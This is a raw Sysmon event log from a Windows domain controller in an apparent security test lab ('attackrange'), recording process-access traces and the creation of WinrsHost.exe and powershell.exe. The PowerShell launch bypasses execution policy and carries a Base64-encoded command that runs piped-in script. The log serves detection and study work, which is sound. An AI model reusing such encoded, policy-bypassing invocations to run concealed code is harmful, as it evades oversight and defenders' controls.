15:51:53.362{D28789B6-7C64-5FA1-0C00-000000008801}6081120C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002658Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:53.362{D28789B6-7C64-5FA1-0C00-000000008801}6081120C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002657Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:53.362{D28789B6-7C64-5FA1-0C00-000000008801}6081120C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002656Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:53.362{D28789B6-7C64-5FA1-0C00-000000008801}6081120C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002655Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:53.362{D28789B6-7C62-5FA1-0500-000000008801}6442432C:\Windows\system32\csrss.exe{D28789B6-7C99-5FA1-7C00-000000008801}3632C:\Windows\system32\WinrsHost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000002654Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:53.362{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C99-5FA1-7C00-000000008801}3632C:\Windows\system32\WinrsHost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6f453|C:\Windows\System32\KERNEL32.DLL+1d37f|c:\windows\system32\rpcss.dll+35069|c:\windows\system32\rpcss.dll+3a852|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+2e43b|C:\Windows\System32\RPCRT4.dll+6213a|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000002653Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:53.369{D28789B6-7C99-5FA1-7C00-000000008801}3632C:\Windows\System32\winrshost.exe10.0.14393.0 (rs1_release.160715-1616)Host Process for WinRM's Remote Shell pluginMicrosoft® Windows® Operating SystemMicrosoft Corporationwinrshost.exeC:\Windows\system32\WinrsHost.exe -EmbeddingC:\Windows\system32\ATTACKRANGE\Administrator{D28789B6-7C99-5FA1-8F0D-050000000000}0x50d8f0HighMD5=F40EC96CA18D88CB1F26FA2070010714,SHA256=607C014A3CA531FFAD50BCD90095C01E4E6B691D9E18473C70E4699CF1E31453,IMPHASH=4216D8E7F36901B61DFD6309B49BCF96{D28789B6-7C64-5FA1-0C00-000000008801}608C:\Windows\System32\svchost.exeC:\Windows\system32\svchost.exe -k DcomLaunch 10341000x80000000000000002652Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:53.362{D28789B6-7C62-5FA1-0B00-000000008801}8684056C:\Windows\system32\lsass.exe{D28789B6-7C64-5FA1-1500-000000008801}1336C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+11c6e|C:\Windows\system32\lsasrv.dll+1e0a8|C:\Windows\system32\lsasrv.dll+1d2d1|C:\Windows\system32\lsasrv.dll+1bb00|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002651Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:53.362{D28789B6-7C62-5FA1-0B00-000000008801}8684056C:\Windows\system32\lsass.exe{D28789B6-7C64-5FA1-1500-000000008801}1336C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+11c6e|C:\Windows\system32\lsasrv.dll+1a4e6|C:\Windows\system32\lsasrv.dll+1ba8f|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002650Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:53.362{D28789B6-7C62-5FA1-0B00-000000008801}8684056C:\Windows\system32\lsass.exe{D28789B6-7C64-5FA1-1500-000000008801}1336C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+1b05d|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002849Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:58.990{D28789B6-7C9E-5FA1-8600-000000008801}23921200C:\Windows\system32\conhost.exe{D28789B6-7C9E-5FA1-8900-000000008801}5004C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002848Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:58.990{D28789B6-7C64-5FA1-0C00-000000008801}6081120C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002847Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:58.990{D28789B6-7C64-5FA1-0C00-000000008801}6081120C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002846Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:58.990{D28789B6-7C64-5FA1-0C00-000000008801}6081120C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002845Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:58.990{D28789B6-7C64-5FA1-0C00-000000008801}6081120C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002844Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:58.990{D28789B6-7C64-5FA1-0C00-000000008801}6081120C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002843Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:58.990{D28789B6-7C64-5FA1-0C00-000000008801}6081120C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002842Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:58.990{D28789B6-7C64-5FA1-0C00-000000008801}6081120C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002841Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:58.990{D28789B6-7C64-5FA1-0C00-000000008801}6081120C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002840Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:58.990{D28789B6-7C64-5FA1-0C00-000000008801}6081120C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002839Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:58.990{D28789B6-7C62-5FA1-0500-000000008801}644804C:\Windows\system32\csrss.exe{D28789B6-7C9E-5FA1-8900-000000008801}5004C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000002838Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:58.990{D28789B6-7C9E-5FA1-8800-000000008801}17405008C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe{D28789B6-7C9E-5FA1-8900-000000008801}5004C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\7e90080f26800b0f94f23eecd5dbab97\System.ni.dll+3332f6|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\7e90080f26800b0f94f23eecd5dbab97\System.ni.dll+2b5560|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\7e90080f26800b0f94f23eecd5dbab97\System.ni.dll+2b4f07|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\5e34168d1758dfad033ef2bb53d5a1c2\System.Management.Automation.ni.dll+6569a79b|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\5e34168d1758dfad033ef2bb53d5a1c2\System.Management.Automation.ni.dll+64b3b625|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\5e34168d1758dfad033ef2bb53d5a1c2\System.Management.Automation.ni.dll+64b3b2f6|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\5e34168d1758dfad033ef2bb53d5a1c2\System.Management.Automation.ni.dll+655ec95b|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\5e34168d1758dfad033ef2bb53d5a1c2\System.Management.Automation.ni.dll+64afbe8c|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\5e34168d1758dfad033ef2bb53d5a1c2\System.Management.Automation.ni.dll+64b5a35b|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\5e34168d1758dfad033ef2bb53d5a1c2\System.Management.Automation.ni.dll+64b3d9c0|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\5e34168d1758dfad033ef2bb53d5a1c2\System.Management.Automation.ni.dll+64b3d9c0|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\5e34168d1758dfad033ef2bb53d5a1c2\System.Management.Automation.ni.dll+64b3d851|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\5e34168d1758dfad033ef2bb53d5a1c2\System.Management.Automation.ni.dll+64b2f7d6|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\5e34168d1758dfad033ef2bb53d5a1c2\System.Management.Automation.ni.dll+64b3bd09|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\5e34168d1758dfad033ef2bb53d5a1c2\System.Management.Automation.ni.dll+64b3b8fc|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\5e34168d1758dfad033ef2bb53d5a1c2\System.Management.Automation.ni.dll+64b3b625|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\5e34168d1758dfad033ef2bb53d5a1c2\System.Management.Automation.ni.dll+64b3b2f6|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\5e34168d1758dfad033ef2bb53d5a1c2\System.Management.Automation.ni.dll+655ec95b|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\5e34168d1758dfad033ef2bb53d5a1c2\System.Management.Automation.ni.dll+64b22157|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\5e34168d1758dfad033ef2bb53d5a1c2\System.Management.Automation.ni.dll+64b21727 154100x80000000000000002837Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:58.993{D28789B6-7C9E-5FA1-8900-000000008801}5004C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe10.0.14393.206 (rs1_release.160915-0644)Windows PowerShellMicrosoft® Windows® Operating SystemMicrosoft CorporationPowerShell.EXE"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -NonInteractive -ExecutionPolicy Unrestricted -EncodedCommand JgBjAGgAYwBwAC4AYwBvAG0AIAA2ADUAMAAwADEAIAA+ACAAJABuAHUAbABsAAoAJABlAHgAZQBjAF8AdwByAGEAcABwAGUAcgBfAHMAdAByACAAPQAgACQAaQBuAHAAdQB0ACAAfAAgAE8AdQB0AC0AUwB0AHIAaQBuAGcACgAkAHMAcABsAGkAdABfAHAAYQByAHQAcwAgAD0AIAAkAGUAeABlAGMAXwB3AHIAYQBwAHAAZQByAF8AcwB0AHIALgBTAHAAbABpAHQAKABAACgAIgBgADAAYAAwAGAAMABgADAAIgApACwAIAAyACwAIABbAFMAdAByAGkAbgBnAFMAcABsAGkAdABPAHAAdABpAG8AbgBzAF0AOgA6AFIAZQBtAG8AdgBlAEUAbQBwAHQAeQBFAG4AdAByAGkAZQBzACkACgBJAGYAIAAoAC0AbgBvAHQAIAAkAHMAcABsAGkAdABfAHAAYQByAHQAcwAuAEwAZQBuAGcAdABoACAALQBlAHEAIAAyACkAIAB7ACAAdABoAHIAbwB3ACAAIgBpAG4AdgBhAGwAaQBkACAAcABhAHkAbABvAGEAZAAiACAAfQAKAFMAZQB0AC0AVgBhAHIAaQBhAGIAbABlACAALQBOAGEAbQBlACAAagBzAG8AbgBfAHIAYQB3ACAALQBWAGEAbAB1AGUAIAAkAHMAcABsAGkAdABfAHAAYQByAHQAcwBbADEAXQAKACQAZQB4AGUAYwBfAHcAcgBhAHAAcABlAHIAIAA9ACAAWwBTAGMAcgBpAHAAdABCAGwAbwBjAGsAXQA6ADoAQwByAGUAYQB0AGUAKAAkAHMAcABsAGkAdABfAHAAYQByAHQAcwBbADAAXQApAAoAJgAkAGUAeABlAGMAXwB3AHIAYQBwAHAAZQByAA==C:\Users\Administrator\ATTACKRANGE\Administrator{D28789B6-7C9E-5FA1-0936-050000000000}0x536090HighMD5=097CE5761C89434367598B34FE32893B,SHA256=BA4038FD20E474C047BE8AAD5BFACDB1BFC1DDBE12F803F473B7918D8D819436,IMPHASH=CAEE994F79D85E47C06E5FA9CDEAE45